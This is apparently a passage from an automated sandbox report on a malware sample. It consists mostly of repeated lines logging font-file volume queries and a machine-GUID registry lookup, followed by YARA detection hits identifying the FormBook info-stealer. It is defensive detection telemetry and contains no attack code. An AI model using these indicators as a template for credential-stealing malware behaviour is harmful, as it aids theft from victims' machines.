          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.677567627.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.763395770.0000000001530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.918604632.0000000003540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.679714687.0000000003DE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.763453752.0000000001560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.SKlGhwkzTi.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.SKlGhwkzTi.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.SKlGhwkzTi.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.SKlGhwkzTi.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SKlGhwkzTi.exe.3de9930.1.raw.unpack, type: UNPACKEDPE

